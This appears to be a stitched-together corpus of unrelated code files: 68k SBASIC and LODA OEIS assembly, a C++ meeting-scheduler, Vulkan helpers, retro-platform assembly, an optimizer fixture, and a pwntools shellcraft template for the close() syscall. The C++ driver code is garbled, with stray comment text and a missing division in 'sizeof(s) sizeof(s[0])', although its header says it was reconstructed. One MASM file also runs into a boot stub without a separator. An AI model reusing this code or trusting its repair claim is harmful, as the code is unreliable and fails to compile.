; d1 r byte fetched
; a0 c p channel ID
; a1 p
; error returns standard
;---
gu_fbcur
	move.l a1,-(sp)		; preserve a1 across the I/O calls
	moveq #iow.ecur,d0	; enable cursor
	bsr.s gu_iow
	moveq #iob.fbyt,d0	; fetch-byte operation key
	bsr.s gu_iow		; fetch byte
	movem.l d0/d1,-(sp)	; save fetch status (d0) and the byte read (d1)
	moveq #iow.dcur,d0	; and disable cursor
	bsr.s gu_iow		; (its status is deliberately discarded)
	movem.l (sp)+,d0/d1/a1	; restore byte read and status
	tst.l d0		; set condition codes on the fetch status for the caller
	rts
end
|
; A130235: Partial sums of the 'lower' Fibonacci Inverse A130233.
; 0,2,5,9,13,18,23,28,34,40,46,52,58,65,72,79,86,93,100,107,114,122,130,138,146,154,162,170,178,186,194,202,210,218,227,236,245,254,263,272,281,290,299,308,317,326,335,344,353,362,371,380,389,398,407,417,427
lpb $0        ; loop while $0 > 0 (presumably counting indices down — LODA lpb semantics)
mov $2,$0
sub $0,1
seq $2,131234 ; Starts with 1, then n appears Fibonacci(n-1) times.
add $1,$2     ; accumulate the partial sum in $1
lpe
mov $0,$1     ; result: partial sum of A130233 terms
|
// Maximum Meetings in One Room (greedy activity selection by earliest finish
// time). Reconstructed from a corrupted paste in which every '<', '>', '<<',
// '>=' and '/' token (and the '//' comment markers) had been stripped.
// Explicit standard headers are used instead of the non-portable
// <bits/stdc++.h>.
#include <algorithm>
#include <iostream>
#include <vector>
using namespace std;

// Structure for storing a meeting pair (start, finish) and its 1-based
// position in the input.
struct meeting {
    int start;
    int end;
    int pos;
};

// Comparator: sort meetings by ascending finish time (greedy order).
bool endSort(struct meeting m1, meeting m2)
{
    return (m1.end < m2.end);
}

// Prints the maximum number of non-overlapping meetings that fit in one room,
// followed by the (1-based) indices of the selected meetings.
//   s: start times, f: finish times, n: number of meetings (n > 0).
void maximumMeetings(int s[], int f[], int n)
{
    // std::vector instead of a variable-length array (VLAs are not standard C++).
    vector<meeting> meet(n);
    int c = 1; // the earliest-finishing meeting is always selected

    // Creating pairs of meeting (start, end) and position.
    for (int i = 0; i < n; i++)
    {
        meet[i].start = s[i];
        meet[i].end = f[i];
        meet[i].pos = i + 1;
    }

    // Sorting of meetings in ascending order according to their finish time.
    sort(meet.begin(), meet.end(), endSort);

    // Vector for storing selected meetings.
    vector<int> m;

    // First meeting is always selected.
    m.push_back(meet[0].pos);
    int prev_end = meet[0].end;

    // Checking if each subsequent meeting can take place.
    for (int i = 1; i < n; i++) {
        // A meeting fits if it starts no earlier than the previous finish.
        if (meet[i].start >= prev_end)
        {
            m.push_back(meet[i].pos);
            prev_end = meet[i].end;
            c++;
        }
    }

    cout << "Maximum meetings that can take place are " << c;
    cout << "\nSelected meetings ";
    for (size_t i = 0; i < m.size(); i++) {
        cout << m[i] << " ";
    }
}
Driver code
int main()
{
Start times
int s[] = { 1, 2, 0, 6, 9, 10 };
Finish times
int f[] = { 3, 5, 7, 8, 11, 12 };
int n = sizeof(s) sizeof(s[0]);
maximumMeetings(s, f, n);
return 0;
}
|
#include "drape/vulkan/vulkan_utils.hpp"
#include <array>
namespace dp
{
namespace vulkan
{
namespace
{
// Sampler package.
// Byte positions of each sampler parameter inside SamplerKey::m_sampler;
// written and read via SetStateByte/GetStateByte in SamplerKey below.
uint8_t constexpr kWrapSModeByte = 3;
uint8_t constexpr kWrapTModeByte = 2;
uint8_t constexpr kMagFilterByte = 1;
uint8_t constexpr kMinFilterByte = 0;
}  // namespace
// Returns the textual name of a VkResult for logging/diagnostics.
// Falls through to "Unknown result" for values not covered by the enum
// version these cases were generated from.
std::string GetVulkanResultString(VkResult result)
{
  switch (result)
  {
  case VK_SUCCESS: return "VK_SUCCESS";
  case VK_NOT_READY: return "VK_NOT_READY";
  case VK_TIMEOUT: return "VK_TIMEOUT";
  case VK_EVENT_SET: return "VK_EVENT_SET";
  case VK_EVENT_RESET: return "VK_EVENT_RESET";
  case VK_INCOMPLETE: return "VK_INCOMPLETE";
  case VK_ERROR_OUT_OF_HOST_MEMORY: return "VK_ERROR_OUT_OF_HOST_MEMORY";
  case VK_ERROR_OUT_OF_DEVICE_MEMORY: return "VK_ERROR_OUT_OF_DEVICE_MEMORY";
  case VK_ERROR_INITIALIZATION_FAILED: return "VK_ERROR_INITIALIZATION_FAILED";
  case VK_ERROR_DEVICE_LOST: return "VK_ERROR_DEVICE_LOST";
  case VK_ERROR_MEMORY_MAP_FAILED: return "VK_ERROR_MEMORY_MAP_FAILED";
  case VK_ERROR_LAYER_NOT_PRESENT: return "VK_ERROR_LAYER_NOT_PRESENT";
  case VK_ERROR_EXTENSION_NOT_PRESENT: return "VK_ERROR_EXTENSION_NOT_PRESENT";
  case VK_ERROR_FEATURE_NOT_PRESENT: return "VK_ERROR_FEATURE_NOT_PRESENT";
  case VK_ERROR_INCOMPATIBLE_DRIVER: return "VK_ERROR_INCOMPATIBLE_DRIVER";
  case VK_ERROR_TOO_MANY_OBJECTS: return "VK_ERROR_TOO_MANY_OBJECTS";
  case VK_ERROR_FORMAT_NOT_SUPPORTED: return "VK_ERROR_FORMAT_NOT_SUPPORTED";
  case VK_ERROR_FRAGMENTED_POOL: return "VK_ERROR_FRAGMENTED_POOL";
  case VK_ERROR_SURFACE_LOST_KHR: return "VK_ERROR_SURFACE_LOST_KHR";
  case VK_ERROR_NATIVE_WINDOW_IN_USE_KHR: return "VK_ERROR_NATIVE_WINDOW_IN_USE_KHR";
  case VK_SUBOPTIMAL_KHR: return "VK_SUBOPTIMAL_KHR";
  case VK_ERROR_OUT_OF_DATE_KHR: return "VK_ERROR_OUT_OF_DATE_KHR";
  case VK_ERROR_INCOMPATIBLE_DISPLAY_KHR: return "VK_ERROR_INCOMPATIBLE_DISPLAY_KHR";
  case VK_ERROR_VALIDATION_FAILED_EXT: return "VK_ERROR_VALIDATION_FAILED_EXT";
  case VK_ERROR_INVALID_SHADER_NV: return "VK_ERROR_INVALID_SHADER_NV";
  case VK_ERROR_INVALID_DRM_FORMAT_MODIFIER_PLANE_LAYOUT_EXT:
    return "VK_ERROR_INVALID_DRM_FORMAT_MODIFIER_PLANE_LAYOUT_EXT";
  case VK_ERROR_FRAGMENTATION_EXT: return "VK_ERROR_FRAGMENTATION_EXT";
  case VK_ERROR_NOT_PERMITTED_EXT: return "VK_ERROR_NOT_PERMITTED_EXT";
  case VK_ERROR_OUT_OF_POOL_MEMORY_KHR: return "VK_ERROR_OUT_OF_POOL_MEMORY_KHR";
  case VK_ERROR_INVALID_EXTERNAL_HANDLE_KHR: return "VK_ERROR_INVALID_EXTERNAL_HANDLE_KHR";
  case VK_RESULT_RANGE_SIZE: return "VK_RESULT_RANGE_SIZE";
  case VK_RESULT_MAX_ENUM: return "VK_RESULT_MAX_ENUM";
  }
  UNREACHABLE();
  return "Unknown result";
}
// static
VkFormat VulkanFormatUnpacker::m_bestDepthFormat = VK_FORMAT_UNDEFINED;
// static
// Probes the physical device and caches the best supported depth format
// (preferring D32 over X8_D24 over D16), then verifies that the fixed
// depth-stencil format and the two framebuffer color formats are usable as
// optimal-tiling attachments. Returns false (after logging) if any required
// format is unsupported.
bool VulkanFormatUnpacker::Init(VkPhysicalDevice gpu)
{
  // Candidate depth formats, in decreasing order of precision/preference.
  std::array<VkFormat, 3> depthFormats = {{VK_FORMAT_D32_SFLOAT,
                                           VK_FORMAT_X8_D24_UNORM_PACK32,
                                           VK_FORMAT_D16_UNORM}};
  VkFormatProperties formatProperties;
  for (auto depthFormat : depthFormats)
  {
    vkGetPhysicalDeviceFormatProperties(gpu, depthFormat, &formatProperties);
    if (formatProperties.optimalTilingFeatures & VK_FORMAT_FEATURE_DEPTH_STENCIL_ATTACHMENT_BIT)
    {
      m_bestDepthFormat = depthFormat;
      break;
    }
  }

  if (m_bestDepthFormat == VK_FORMAT_UNDEFINED)
  {
    LOG(LWARNING, ("Vulkan error: there is no any supported depth format."));
    return false;
  }

  // The combined depth-stencil format has no fallback; it must be supported.
  vkGetPhysicalDeviceFormatProperties(gpu, Unpack(TextureFormat::DepthStencil), &formatProperties);
  if (!(formatProperties.optimalTilingFeatures & VK_FORMAT_FEATURE_DEPTH_STENCIL_ATTACHMENT_BIT))
  {
    LOG(LWARNING, ("Vulkan error: depth-stencil format is unsupported."));
    return false;
  }

  // Color formats rendered to by framebuffers must support color attachment.
  std::array<VkFormat, 2> framebufferColorFormats = {{Unpack(TextureFormat::RGBA8),
                                                      Unpack(TextureFormat::RedGreen)}};
  for (auto colorFormat : framebufferColorFormats)
  {
    vkGetPhysicalDeviceFormatProperties(gpu, colorFormat, &formatProperties);
    if (!(formatProperties.optimalTilingFeatures & VK_FORMAT_FEATURE_COLOR_ATTACHMENT_BIT))
    {
      LOG(LWARNING, ("Vulkan error: framebuffer format", colorFormat, "is unsupported."));
      return false;
    }
  }

  return true;
}
// static
// Maps a dp::TextureFormat to the corresponding VkFormat.
// Depth maps to the best supported depth format discovered by Init();
// Unspecified is a programming error (CHECK-fails).
VkFormat VulkanFormatUnpacker::Unpack(TextureFormat format)
{
  switch (format)
  {
  case TextureFormat::RGBA8: return VK_FORMAT_R8G8B8A8_UNORM;
  case TextureFormat::Alpha: return VK_FORMAT_R8_UNORM;
  case TextureFormat::RedGreen: return VK_FORMAT_R8G8_UNORM;
  case TextureFormat::DepthStencil: return VK_FORMAT_D24_UNORM_S8_UINT;
  case TextureFormat::Depth: return m_bestDepthFormat;
  case TextureFormat::Unspecified:
    CHECK(false, ());
    return VK_FORMAT_UNDEFINED;
  }
  CHECK(false, ());
  // Unreachable when CHECK aborts, but without it control could reach the end
  // of a non-void function (UB / -Wreturn-type) if CHECK is not noreturn.
  return VK_FORMAT_UNDEFINED;
}
// Packs sampler parameters (filter + wrap modes) into a single integer key
// so samplers can be cached and ordered; one byte per parameter, positions
// given by the k*Byte constants above.
SamplerKey::SamplerKey(TextureFilter filter, TextureWrapping wrapSMode, TextureWrapping wrapTMode)
{
  Set(filter, wrapSMode, wrapTMode);
}

// Re-packs all parameters. The same filter is stored in both the min- and
// mag-filter bytes.
void SamplerKey::Set(TextureFilter filter, TextureWrapping wrapSMode, TextureWrapping wrapTMode)
{
  SetStateByte(m_sampler, static_cast<uint8_t>(filter), kMinFilterByte);
  SetStateByte(m_sampler, static_cast<uint8_t>(filter), kMagFilterByte);
  SetStateByte(m_sampler, static_cast<uint8_t>(wrapSMode), kWrapSModeByte);
  SetStateByte(m_sampler, static_cast<uint8_t>(wrapTMode), kWrapTModeByte);
}

// Reads the filter back from the min-filter byte (min == mag by Set()).
TextureFilter SamplerKey::GetTextureFilter() const
{
  return static_cast<TextureFilter>(GetStateByte(m_sampler, kMinFilterByte));
}

TextureWrapping SamplerKey::GetWrapSMode() const
{
  return static_cast<TextureWrapping>(GetStateByte(m_sampler, kWrapSModeByte));
}

TextureWrapping SamplerKey::GetWrapTMode() const
{
  return static_cast<TextureWrapping>(GetStateByte(m_sampler, kWrapTModeByte));
}

// Strict weak ordering on the packed key, for use in ordered containers.
bool SamplerKey::operator<(SamplerKey const & rhs) const
{
  return m_sampler < rhs.m_sampler;
}
} // namespace vulkan
} // namespace dp
|
; A040063: Continued fraction for sqrt(72).
; 8,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2,16,2
pow $0,4   ; $0 = n^4
mov $1,$0
trn $0,4   ; truncated subtraction: $0 = max(n^4 - 4, 0)
sub $0,4
gcd $1,$0  ; gcd trick selects between the periodic terms — derivation per OEIS A040063
mul $1,2
|
; SBAS_JOB - SBASIC Job V2.00 1994 Tony Tebby QJUMP
section sbas
xdef sb_job
xdef sb_die
xdef sb_fatal
xdef sb_name
xdef sb_thing
xref sb_initv
xref sb_initc
xref sb_main
xref sb_start
xref sb_xcmd
xref sb_qd5
xref sb_anam2
xref sb_aldat
xref sb_resch
xref sb_inchan
xref.l sb.vers
xref uq_opcon
xref gu_thini
xref gu_mexec
include 'dev8_keys_sbasic'
include 'dev8_keys_qlv'
include 'dev8_keys_qdos_sms'
include 'dev8_keys_thg'
include 'dev8_keys_k'
include 'dev8_keys_err'
include 'dev8_mac_assert'
;+++
; Initialise Thing
;---
;+++
; Initialise Thing
;---
sb_thing
	lea sb_thtab,a1		; thing linkage table
	jmp gu_thini		; common thing initialisation

; Thing linkage table followed by the thing definition itself.
sb_thtab
	dc.l th_name+8		; size of linkage
	dc.l sb_thdef-*		; thing
	dc.l sb.vers		; version
sb_name
	dc.w 6,'SBASIC'
sb_thdef
	dc.l thh.flag		; flag
	dc.l tht.exec		; executable
	dc.l sb_job-sb_thdef	; header
	dc.l sbj_start-sb_job	; ... length
	dc.l sb.jobsz		; dataspace
	dc.l sbj_start-sb_thdef	; start address
;+++
; SBASIC Job
;---
sb_job
	bra.s sbj_start
	dc.w 0,0,$4afb		; standard QDOS job header marker
	dc.w 6,'SBASIC'

; Job-zero entry: variables are already set up, just open the consoles.
sbj_job0
	jsr sb_initc		; initialise job zero consoles
	jmp sb_main

sbj_start
	move.l a0,d0		; A0 is set if Job 0 entry
	bne.s sbj_job0		; ... job 0 entry, vars already set
	jsr sb_initv		; initial SBASIC allocation
	move.w (sp)+,d4		; number of channels open
	beq.l sbj_new		; new SBASIC
	move.l (sp),d0		; first ID
	bmi.s sbj_chn0		; definition for channel 0 (d4>0)
	cmp.l #'QD5S',d0	; QD5 stack signature?
	beq.l sb_qd5
	move.l (sp)+,sb_cmdch(a6) ; input file
	subq.w #1,d4
	beq.s sbj_ckstr		; no channels on stack
	moveq #ch.len,d1
	mulu d4,d1		; room required in channel table
	jsr sb_resch
	move.l sb_chanp(a6),a2
	subq.w #1,d4
	bgt.s sbj_chloop	; more than 2 channels
	tst.w (sp)		; channel 0 open?
	bmi.s sbj_chn0		; definition for channel 0 (d4=0)

; Copy the channel IDs from the stack into the channel table.
sbj_chloop
	move.l (sp)+,a0
	jsr sb_inchan		; set up channel
	dbra d4,sbj_chloop
	move.l a2,sb_chanp(a6)

sbj_ckstr
	move.w (sp)+,d3		; length of string
	beq.l sbj_go		; ... none
	bra.s sbj_cmd$		; set cmd$

; open console - size on stack, stack is cleaned
sbj_open0
	move.l (sp)+,a3		; return address (called with bsr)
	move.l #$ff010004,-(sp)	; colour
	move.l sp,a1
	jsr uq_opcon
	bne.l sb_fatal		; cannot continue without a console
	add.w #$c,sp		; clear stack
	move.l sb_chanp(a6),a2
	jsr sb_inchan		; open channel
	move.l a2,sb_chanp(a6)
	jmp (a3)

sbj_chn0
	not.l (sp)		; set origin right
	move.l #$0100003e,-(sp)	; size
	bsr sbj_open0		; open it
	move.w (sp)+,d3		; length of string
	beq.s sbj_go		; ... none
	tst.w d4		; d4 is 0 for string = cmd$
	bne.s sbj_cmdl		; 1 for string = command line

; Store the supplied string as the SBASIC variable cmd$.
sbj_cmd$
	move.l sb_buffb(a6),a1
	move.l #'cmd$',(a6,a1.l)
	moveq #4,d2		; set up cmd$
	jsr sb_anam2
	move.b #nt.var,(a6,a3.l) ; and usage
	moveq #dt_stchr-dt_stalc+7,d1 ; add 6 bytes and round up
	add.w d3,d1
	and.w #$fff8,d1		; to multiple of 8
	jsr sb_aldat		; allocate hole
	assert dt_stalc+4,dt_flstr+1,dt_stlen
	move.w d1,(a0)+		; allocation
	move.w #$00ff,(a0)+	; flags
	move.l a0,nt_value(a6,a3.l)
	move.w d3,(a0)+		; length
sbj_csloop
	move.w (sp)+,(a0)+	; copy characters
	subq.w #2,d3
	bgt.s sbj_csloop
	bra.s sbj_go

sbj_new
	move.w (sp)+,d3		; any string?
	beq.s sbj_all		; ... no, open all

; Copy the string into the command buffer and execute it.
sbj_cmdl
	move.l sb_buffb(a6),a1
	add.l a6,a1
sbl_clloop
	move.w (sp)+,(a1)+
	subq.w #2,d3
	bgt.s sbl_clloop
	add.w d3,a1		; correct the position
	move.b #k.nl,(a1)+	; newline at end
	sub.l a6,a1
	move.l a1,sb_buffp(a6)
	jmp sb_xcmd		; execute first command

sbj_all
	jsr sb_initc		; open all consoles
sbj_go
	jmp sb_start

; Job termination: sb_die exits with 0, sb_fatal with the error in d0.
sb_die
	moveq #0,d0
sb_fatal
	move.l d0,d3
	moveq #-1,d1		; this job
	moveq #sms.frjb,d0	; force remove job
	trap #do.sms2
	dc.l $4afbedeb
	bra.s *			; should never get here
	dc.l 'DIE '
	end
|
; A168059: Denominator of (n+2)/(n*(n+1)).
; 2,3,12,10,30,21,56,36,90,55,132,78,182,105,240,136,306,171,380,210,462,253,552,300,650,351,756,406,870,465,992,528,1122,595,1260,666,1406,741,1560,820,1722,903,1892,990,2070,1081,2256,1176,2450,1275,2652,1378,2862,1485,3080,1596,3306,1711,3540,1830,3782,1953,4032,2080,4290,2211,4556,2346,4830,2485,5112,2628,5402,2775,5700,2926,6006,3081,6320,3240,6642,3403,6972,3570,7310,3741,7656,3916,8010,4095,8372,4278,8742,4465,9120,4656,9506,4851,9900,5050
mov $2,-2
gcd $2,$0  ; $2 = gcd(-2, n): 2 when n even, 1 when n odd (handles n=0 via |-2|)
add $0,1
mul $2,$0
mul $0,$2
add $0,$2
div $0,2   ; closed form for the denominator of (n+2)/(n*(n+1)) — see A168059
|
	object_const_def
; Empty map-script stub: all scene scripts, callbacks and events are zeroed
; out; the original (Red's house) events are kept below, commented out, as a
; template for re-enabling them.
Shimoda_MapScripts:
	db 0 ; scene scripts
	db 0 ; callbacks
	;callback MAPCALLBACK_NEWMAP, .InitializeRoom
	;callback MAPCALLBACK_TILES, .SetSpawn
Shimoda_MapEvents:
	db 0, 0 ; filler
	db 0 ; warp events
	db 0 ; coord events
	db 0 ; bg events
	;bg_event 0, 1, BGEVENT_READ, RedsHouse1FBookshelf
	;bg_event 1, 1, BGEVENT_READ, RedsHouse1FBookshelf
	;bg_event 2, 1, BGEVENT_READ, RedsHouse1FTV
	db 0 ; object events
	;object_event 5, 3, SPRITE_REDS_MOM, SPRITEMOVEDATA_STANDING_LEFT, 0, 0, -1, -1, 0, OBJECTTYPE_SCRIPT, 0, RedsMom, -1
|
; Repeat Block Examples (Repeat.asm)
; This program demonstrates the REPEAT, FOR,
; FORC, and WHILE directives.
INCLUDE Irvine32.inc
INCLUDE Macros.inc
; A course record: a course number string and a credit count.
COURSE STRUCT
Number BYTE 9 DUP(?)
Credits BYTE ?
COURSE ENDS

; A semester contains an array of courses.
SEMESTER STRUCT
Courses COURSE 6 DUP(<>)
NumCourses WORD ?
SEMESTER ENDS

.data
; Create a character lookup table:
; FORC expands the body once per character; <!> escapes the '>' character.
Delimiters LABEL BYTE
FORC code,<@#$%^&*!<!>>
BYTE "&code"
ENDM
BYTE 0 ; marks the end

; Generate Fibonacci numbers up to 0FFFFh
; (computed at assembly time by the WHILE directive).
f1 = 1
f2 = 1
f3 = f1 + f2
DWORD f1,f2
WHILE f3 LT 0FFFFh
DWORD f3
f1 = f2
f2 = f3
f3 = f1 + f2
ENDM

ECHO ---------------------------------------------------------

; Emit 100 DWORDs: 10, 20, ..., 1000.
iVal = 10
REPEAT 100 ; begin REPT loop
DWORD iVal ; status
iVal = iVal + 10
ENDM

; 52 weekly (rainfall, humidity) pairs; LOCAL avoids duplicate-label errors.
WEEKS_PER_YEAR = 52
WeatherReadings STRUCT
location BYTE 50 DUP(0)
REPEAT WEEKS_PER_YEAR
LOCAL rainfall, humidity
rainfall DWORD ?
humidity DWORD ?
ENDM
WeatherReadings ENDS

;-----------------------------------------------------------
; Define a set of semester variables.
FOR semName,<Fall1999,Spring2000,Summer2000,Fall2000,Spring2001,Summer2001>
semName SEMESTER <>
ENDM

.code
main PROC
mov esi,OFFSET Fall1999
mov ecx,2 ; intended loop count
L1:
mov edx,esi
; NOTE(review): 'OFFSET COURSE.Number' yields the field's offset within the
; struct (0 here) — presumably meant to point edx at the Number field; verify.
add edx,OFFSET COURSE.Number
mWrite "Enter a course name: "
; NOTE(review): this overwrites ecx (the L1 loop counter set to 2 above), so
; 'Loop L1' below decrements from 8, not 2 — the counter should be saved and
; restored (push/pop ecx) around ReadString. TODO confirm intended behavior.
mov ecx,8
call ReadString
mWrite "Enter the credits: "
call ReadInt
mov (COURSE PTR [esi]).Credits,al
add esi,SIZEOF COURSE
Loop L1
exit
main ENDP
END main
;; 32-bit mode
bits 32

MBOOT_HEADER_MAGIC      equ 0xe85250d6  ; multiboot2 header magic
MBOOT_I386_ARCHITECTURE equ 0           ; protected-mode i386

extern kernel_main
extern stack_top
global start

section .multiboot
mboot_start:
        ;; Magic number
        dd MBOOT_HEADER_MAGIC
        ;; Architecture (protected mode i386)
        dd MBOOT_I386_ARCHITECTURE
        ;; Header length
        dd mboot_end - mboot_start
        ;; Checksum (magic + arch + length + checksum == 0 mod 2^32)
        dd 0x100000000 - (MBOOT_HEADER_MAGIC + MBOOT_I386_ARCHITECTURE + (mboot_end - mboot_start))
        ;; End tag
        dw 0
        dw 0
        dd 8
mboot_end:

section .text
start:
        ;; Switch to our own stack BEFORE pushing anything. The original code
        ;; pushed ebx (the multiboot2 information pointer the bootloader hands
        ;; us) onto the bootloader's stack and then reset esp, discarding the
        ;; pushed value, so kernel_main received garbage for its argument.
        mov esp, stack_top
        push ebx            ; multiboot information structure -> kernel_main arg
        cli                 ; Clear interrupts
        call kernel_main
        jmp $               ; hang if kernel_main ever returns
|
; A143831: Numbers n such that 12n^2 - 1 is prime.
; Submitted by Jamie Morken(w3)
; 1,2,3,4,6,7,9,11,13,14,15,17,20,22,24,25,26,27,29,30,35,36,37,38,39,46,48,55,59,61,68,69,72,75,77,79,82,88,91,93,94,102,105,107,108,115,116,117,118,121,124,130,134,136,137,140,149,152,154,157,158,159,162,167
mov $1,2
mov $2,332202  ; loop budget / iteration bound
mov $5,1
lpb $2
mov $3,$6
seq $3,10051 ; Characteristic function of primes: 1 if n is prime, else 0.
sub $0,$3    ; count down one for each prime of the form tested
add $1,3
mov $4,$0
max $4,0
cmp $4,$0    ; 1 while $0 has not gone negative, else 0
mul $2,$4    ; stop the loop once enough primes were found
sub $2,18
add $5,$1
sub $5,1
add $5,$1    ; $5 tracks the next candidate value (fed back via $6)
mov $6,$5
lpe
mov $0,$1
div $0,6     ; recover n from the accumulated step counter
add $0,1
|
; PipisX86
; By Nathaniel Carman
; Wheres all the pipis?
; aowww yeahhhhhhhhhh
; Pipis Room.
section .text
global _start

_start:
	; Each block below is a Linux i386 sys_write (eax=4) to stdout (ebx=1)
	; via int 0x80, with ecx = buffer and edx = length.
	mov edx,amo  ; sussy
	mov ecx,gus  ; imposter
	mov ebx,1
	mov eax,4
	int 0x80
	; NOTE(review): edx/ecx look swapped relative to the other two writes
	; (edx should be the length 'gus', ecx the buffer 'amo') — verify.
	mov edx,len1
	mov ecx,msg1
	mov ebx,1
	mov eax,4
	int 0x80
	mov edx,len2
	mov ecx,msg2
	mov ebx,1
	mov eax,4
	int 0x80
	; sys_exit (eax=1)
	mov eax,1
	int 0x80

section .data
amo db 'This Uses The MIT Licence BTW', 0xa
gus equ $ - amo
msg1 db 'o <----- pipis', 0xa
len1 equ $ - msg1
msg2 db 'Pipis.', 0xa
len2 equ $ - msg2
|
; A141620: First differences of A120070.
; Submitted by Jon Maiga
; 5,-3,10,-3,-5,17,-3,-5,-7,26,-3,-5,-7,-9,37,-3,-5,-7,-9,-11,50,-3,-5,-7,-9,-11,-13,65,-3,-5,-7,-9,-11,-13,-15,82,-3,-5,-7,-9,-11,-13,-15,-17,101,-3,-5,-7,-9,-11,-13,-15,-17,-19,122,-3,-5,-7,-9,-11,-13,-15,-17,-19,-21
mov $3,2
mov $4,$0
lpb $3
mov $0,$4
div $3,2     ; two passes: $3 = 1 then 0
add $0,$3    ; evaluate A120070 at n and n+1
seq $0,120070 ; Triangle of numbers used to compute the frequencies of the spectral lines of the hydrogen atom.
mov $2,$3
mul $2,$0
add $1,$2    ; accumulate the n+1 term
mov $5,$0
lpe
sub $1,$5    ; first difference: a(n+1) - a(n)
mov $0,$1
|
;
; ZX Spectrum OPUS DISCOVERY specific routines
;
; Stefano Bodrato - Jun. 2006
;
; This routine get the kempston joystick emulation status.
;
; $Id: get_kempston.asm,v 1.3 2016/06/27 19:16:33 dom Exp $
;
SECTION code_clib
PUBLIC get_kempston
PUBLIC _get_kempston
get_kempston:
_get_kempston:
	call $1708		; page_in — page the Discovery ROM in (fixed ROM entry; verify address)
	ld a,($3000)		; read status byte ($3000 presumably holds the kempston-emulation flag in bit 7 — TODO confirm)
	and 128			; isolate bit 7 (also sets the Z flag)
	ld hl,0			; default result: 0 (disabled)
	and a			; NOTE(review): redundant — flags were already set by 'and 128'
	jr z,pageout
	inc hl			; result: 1 (kempston emulation enabled)
.pageout
	jp $1748		; page_out and return (tail call)
|
; Making sure the edge case of instructions directly specified as data is handled
; in this case, just for safety, the blocks before and after the "db" statement
; should not be moved.
	; Optimizer test fixture: the layout below is intentional, do not "fix".
	ld a, 1
	jp label1
label2: ; ideally, we would want this block to be moved at the very end,
        ; but the "db 0" breaks the block in two, and for safety, no
        ; optimization is made.
	ld (hl), a
label3:
	jr label3
label1:
	add a, b
	db 0 ; this is a "nop", but specified directly as a byte
	jp label2
|
; A302245: Maximum remainder of p*q divided by p+q with 0 < p <= q <= n.
; 1,2,3,5,7,8,11,11,15,15,19,19,23,23,27,27,31,31,35,35,39,39,43,43,47,47,51,51,55,55,59,59,63,63,67,67,71,71,75,75,79,79,83,83,87,87,91,91,95,95,99,99,103,103,107,107,111,111,115,115,119,119,123,123
mov $2,$0
lpb $2
add $0,$1
mul $1,$2
gcd $1,2   ; $1 collapses to 1 or 2 each pass (parity gadget)
sub $2,$1
gcd $1,$0
lpe
add $0,1   ; final +1 yields the maximum remainder — derivation per OEIS A302245
|
<%
  # Standard pwnlib shellcraft syscall-template preamble: these imports are
  # used by the argument-marshalling logic in the second <% %> block below.
  import collections
  import pwnlib.abi
  import pwnlib.constants
  import pwnlib.shellcraft
  import six
%>
<%docstring>close(fd) -> str

Invokes the syscall close.

See 'man 2 close' for more information.

Arguments:
    fd(int): fd
Returns:
    int
</%docstring>
<%page args="fd=0"/>
<%
    abi = pwnlib.abi.ABI.syscall()
    stack = abi.stack
    regs = abi.register_arguments[1:]
    allregs = pwnlib.shellcraft.registers.current()

    # close() takes no string or array arguments, so these stay empty; the
    # generic marshalling code below is shared across all syscall templates.
    can_pushstr = []
    can_pushstr_array = []

    argument_names = ['fd']
    argument_values = [fd]

    # Load all of the arguments into their destination registers / stack slots.
    register_arguments = dict()
    stack_arguments = collections.OrderedDict()
    string_arguments = dict()
    dict_arguments = dict()
    array_arguments = dict()
    syscall_repr = []

    for name, arg in zip(argument_names, argument_values):
        if arg is not None:
            syscall_repr.append('%s=%r' % (name, arg))

        # If the argument itself (input) is a register...
        if arg in allregs:
            index = argument_names.index(name)
            if index < len(regs):
                target = regs[index]
                register_arguments[target] = arg
            elif arg is not None:
                stack_arguments[index] = arg

        # The argument is not a register.  It is a string value, and we
        # are expecting a string value
        elif name in can_pushstr and isinstance(arg, (six.binary_type, six.text_type)):
            if isinstance(arg, six.text_type):
                arg = arg.encode('utf-8')
            string_arguments[name] = arg

        # The argument is not a register.  It is a dictionary, and we are
        # expecting K:V paris.
        elif name in can_pushstr_array and isinstance(arg, dict):
            array_arguments[name] = ['%s=%s' % (k,v) for (k,v) in arg.items()]

        # The arguent is not a register.  It is a list, and we are expecting
        # a list of arguments.
        elif name in can_pushstr_array and isinstance(arg, (list, tuple)):
            array_arguments[name] = arg

        # The argument is not a register, string, dict, or list.
        # It could be a constant string ('O_RDONLY') for an integer argument,
        # an actual integer value, or a constant.
        else:
            index = argument_names.index(name)
            if index < len(regs):
                target = regs[index]
                register_arguments[target] = arg
            elif arg is not None:
                # NOTE(review): 'target' here is stale (set only when a
                # previous argument had index < len(regs)) — this looks like
                # it should be stack_arguments[index], matching the register
                # branch above; verify against pwnlib upstream.
                stack_arguments[target] = arg

    # Some syscalls have different names on various architectures.
    # Determine which syscall number to use for the current architecture.
    for syscall in ['SYS_close']:
        if hasattr(pwnlib.constants, syscall):
            break
    else:
        # NOTE(review): 'syscalls' is undefined here (the list above is a
        # literal) — if this branch is ever hit it raises NameError instead
        # of the intended message; verify.
        raise Exception("Could not locate any syscalls: %r" % syscalls)
%>
    /* close(${', '.join(syscall_repr)}) */
%for name, arg in string_arguments.items():
    ${pwnlib.shellcraft.pushstr(arg, append_null=(b'\x00' not in arg))}
    ${pwnlib.shellcraft.mov(regs[argument_names.index(name)], abi.stack)}
%endfor
%for name, arg in array_arguments.items():
    ${pwnlib.shellcraft.pushstr_array(regs[argument_names.index(name)], arg)}
%endfor
%for name, arg in stack_arguments.items():
    ${pwnlib.shellcraft.push(arg)}
%endfor
    ${pwnlib.shellcraft.setregs(register_arguments)}
    ${pwnlib.shellcraft.syscall(syscall)}
// smtc_VdfBlockDataScope.inl
//
